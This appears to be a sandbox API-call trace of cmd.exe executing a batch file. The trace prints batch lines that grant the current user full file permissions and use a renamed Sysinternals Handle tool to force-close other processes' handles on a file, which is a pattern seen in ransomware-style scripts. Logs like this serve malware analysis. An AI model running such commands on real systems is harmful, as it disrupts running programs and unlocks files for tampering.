[0221.488] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x92f50c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x92f50c*=0xa3, lpOverlapped=0x0) returned 1 [0221.488] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0221.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0221.488] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.488] GetFileType (hFile=0xb0) returned 0x1 [0221.488] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.488] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0221.488] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0x92ec88, lpFilePart=0x92ec4c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x92ec4c*="vRnqNMBW.bat") returned 0x2a [0221.488] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.488] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.488] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.489] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.489] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0221.489] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.489] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.489] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.973] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.973] _wcsicmp (_String1="cd", _String2=")") returned 58 [0221.973] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0221.973] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0221.973] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0221.973] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0221.973] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0221.973] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0221.974] _tell (_FileHandle=3) returned 78 [0221.974] _close (_FileHandle=3) returned 0 [0221.974] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f2d0 | out: _Buffer="\r\n") returned 2 [0221.974] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.974] GetFileType (hFile=0x3c) returned 0x2 [0221.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.974] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2a8 | out: lpMode=0x92f2a8) returned 1 [0252.774] _get_osfhandle (_FileHandle=1) returned 0x3c [0252.774] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f2c0*=0x2) returned 1 [0256.610] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0256.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0256.610] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x92f2cc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0256.610] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x92f2cc | out: _Buffer=">") returned 1 [0256.610] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.610] GetFileType (hFile=0x3c) returned 0x2 [0256.610] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0256.610] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2ac | out: lpMode=0x92f2ac) returned 1 [0256.620] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.620] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x92f2c4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x92f2c4*=0x1e) returned 1 [0256.623] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.623] GetFileType (hFile=0x3c) returned 0x2 [0256.623] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0256.623] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f54c | out: lpMode=0x92f54c) returned 1 [0256.623] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.623] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xab83c0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f564, lpReserved=0x0 | out: lpBuffer=0xab83c0*, lpNumberOfCharsWritten=0x92f564*=0x2) returned 1 [0256.623] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f56c | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0256.623] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.623] GetFileType (hFile=0x3c) returned 0x2 [0256.623] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0256.623] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0256.624] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.624] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x25) returned 1 [0256.624] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f580 | out: _Buffer="\r\n") returned 2 [0256.624] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.624] GetFileType (hFile=0x3c) returned 0x2 [0256.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0256.624] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f558 | out: lpMode=0x92f558) returned 1 [0256.624] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.624] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f570, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f570*=0x2) returned 1 [0256.625] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0256.625] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0256.625] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0256.625] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0256.625] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0256.625] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0256.625] GetConsoleTitleW (in: lpConsoleTitle=0x92f0f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0256.625] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0256.625] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0256.625] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0256.625] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0256.625] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0256.625] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0256.625] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0256.625] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0256.625] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x92eea8, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x92eea0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x92eea0*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0256.626] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0256.626] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x92ec4c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0256.626] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0x92ec4c, lpFilePart=0x92ec44 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x92ec44*=0x0) returned 0x1e [0256.626] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0257.043] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x92e9c8 | out: lpFindFileData=0x92e9c8) returned 0xaa0b68 [0257.043] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0257.043] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x92e9c8 | out: lpFindFileData=0x92e9c8) returned 0xaa0b68 [0257.043] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0257.043] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0257.043] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x92e9c8 | out: lpFindFileData=0x92e9c8) returned 0xaa0b68 [0257.044] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0257.044] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0257.044] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0257.044] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0257.044] GetEnvironmentStringsW () returned 0xaad550* [0257.044] FreeEnvironmentStringsA (penv="=") returned 1 [0257.044] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0257.044] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.044] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0258.168] _get_osfhandle (_FileHandle=1) returned 0x3c [0258.168] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0259.021] _get_osfhandle (_FileHandle=0) returned 0x38 [0259.021] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0259.374] SetConsoleInputExeNameW () returned 0x1 [0259.375] GetConsoleOutputCP () returned 0x1b5 [0260.937] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0260.938] SetThreadUILanguage (LangId=0x0) returned 0x409 [0261.933] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x92f53c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0262.006] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0262.006] _get_osfhandle (_FileHandle=3) returned 0xb0 [0262.006] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0262.006] _get_osfhandle (_FileHandle=3) returned 0xb0 [0262.006] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0262.006] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x92f50c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x92f50c*=0x94, lpOverlapped=0x0) returned 1 [0262.007] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0262.007] _get_osfhandle (_FileHandle=3) returned 0xb0 [0262.007] GetFileType (hFile=0xb0) returned 0x1 [0262.007] _get_osfhandle (_FileHandle=3) returned 0xb0 [0262.007] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0262.007] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"Genko_1.jtp\"") returned 0xd [0262.007] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0262.007] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0262.008] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0262.008] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0262.008] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0262.008] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0262.008] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0262.008] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0262.008] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0262.008] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0262.008] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0262.009] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0262.009] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0262.009] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0262.009] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0262.009] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0262.009] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0262.009] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0262.010] _tell (_FileHandle=3) returned 226 [0262.010] _close (_FileHandle=3) returned 0 [0262.010] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f2d0 | out: _Buffer="\r\n") returned 2 [0262.010] _get_osfhandle (_FileHandle=1) returned 0x3c [0262.010] GetFileType (hFile=0x3c) returned 0x2 [0262.010] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0262.010] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2a8 | out: lpMode=0x92f2a8) returned 1 [0263.909] _get_osfhandle (_FileHandle=1) returned 0x3c [0263.909] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f2c0*=0x2) returned 1 [0264.229] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0264.229] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0264.229] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x92f2cc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0264.229] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x92f2cc | out: _Buffer=">") returned 1 [0264.229] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.229] GetFileType (hFile=0x3c) returned 0x2 [0264.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.229] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2ac | out: lpMode=0x92f2ac) returned 1 [0264.624] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.624] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x92f2c4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x92f2c4*=0x1e) returned 1 [0264.646] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x92f56c | out: _Buffer="FOR") returned 3 [0264.646] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.646] GetFileType (hFile=0x3c) returned 0x2 [0264.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.646] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0264.666] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.666] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x3) returned 1 [0264.716] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x92f56c | out: _Buffer=" /F") returned 3 [0264.716] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.716] GetFileType (hFile=0x3c) returned 0x2 [0264.716] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.716] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0264.719] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.719] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x3) returned 1 [0264.744] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x92f56c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0264.744] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.744] GetFileType (hFile=0x3c) returned 0x2 [0264.744] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.744] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0264.747] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.747] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x20) returned 1 [0264.768] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x92f56c | out: _Buffer=" %I IN ") returned 7 [0264.768] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.768] GetFileType (hFile=0x3c) returned 0x2 [0264.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.768] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0264.772] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.772] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x7) returned 1 [0264.773] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x92f568 | out: _Buffer="(`vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner`) DO ") returned 56 [0264.773] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.773] GetFileType (hFile=0x3c) returned 0x2 [0264.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.773] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f540 | out: lpMode=0x92f540) returned 1 [0264.774] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.774] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0x92f558, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f558*=0x38) returned 1 [0264.776] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.776] GetFileType (hFile=0x3c) returned 0x2 [0264.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.776] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f54c | out: lpMode=0x92f54c) returned 1 [0264.780] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.780] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x92f564, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x92f564*=0x1) returned 1 [0264.797] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.798] GetFileType (hFile=0x3c) returned 0x2 [0264.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.798] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f53c | out: lpMode=0x92f53c) returned 1 [0264.800] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.800] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xaa0b70*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x92f554, lpReserved=0x0 | out: lpBuffer=0xaa0b70*, lpNumberOfCharsWritten=0x92f554*=0xc) returned 1 [0264.811] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f55c | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0264.811] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.811] GetFileType (hFile=0x3c) returned 0x2 [0264.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.811] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f534 | out: lpMode=0x92f534) returned 1 [0264.871] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.871] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x92f54c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f54c*=0x26) returned 1 [0264.902] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f56c | out: _Buffer=") ") returned 2 [0264.902] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.902] GetFileType (hFile=0x3c) returned 0x2 [0264.902] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.903] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0264.934] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.934] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x2) returned 1 [0264.984] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f580 | out: _Buffer="\r\n") returned 2 [0264.984] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.984] GetFileType (hFile=0x3c) returned 0x2 [0264.984] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.984] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f558 | out: lpMode=0x92f558) returned 1 [0264.991] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.991] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f570, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f570*=0x2) returned 1 [0264.992] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0264.992] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0264.992] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0264.992] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0264.992] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0264.992] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0264.992] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0264.992] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x92f4a8, _Radix=0 | out: _EndPtr=0x92f4a8*=",6 delims=: \"") returned 3 [0264.992] wcstol (in: _String="6 delims=: \"", _EndPtr=0x92f4a8, _Radix=0 | out: _EndPtr=0x92f4a8*=" delims=: \"") returned 6 [0264.992] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0264.992] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0264.992] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0264.992] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0264.992] _wpopen (_Command="vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner", _Mode="rb") returned 0x77981268 [0265.002] feof (_File=0x77981268) returned 0 [0265.002] ferror (_File=0x77981268) returned 0 [0265.002] fgets (in: _Buf=0xaac9e0, _MaxCount=256, _File=0x77981268 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77981268) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0267.077] feof (_File=0x77981268) returned 0 [0267.077] ferror (_File=0x77981268) returned 0 [0267.077] fgets (in: _Buf=0xaaca26, _MaxCount=442, _File=0x77981268 | out: _Buf="\r\r\n", _File=0x77981268) returned="\r\r\n" [0267.078] feof (_File=0x77981268) returned 0 [0267.078] ferror (_File=0x77981268) returned 0 [0267.078] fgets (in: _Buf=0xaaf961, _MaxCount=695, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0269.462] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 1 [0269.463] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xaaf961, cbMultiByte=73, lpWideCharStr=0xaaf918, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0269.463] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f188 | out: _Buffer="\r\n") returned 2 [0269.463] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.463] GetFileType (hFile=0x3c) returned 0x2 [0269.463] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.463] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f160 | out: lpMode=0x92f160) returned 1 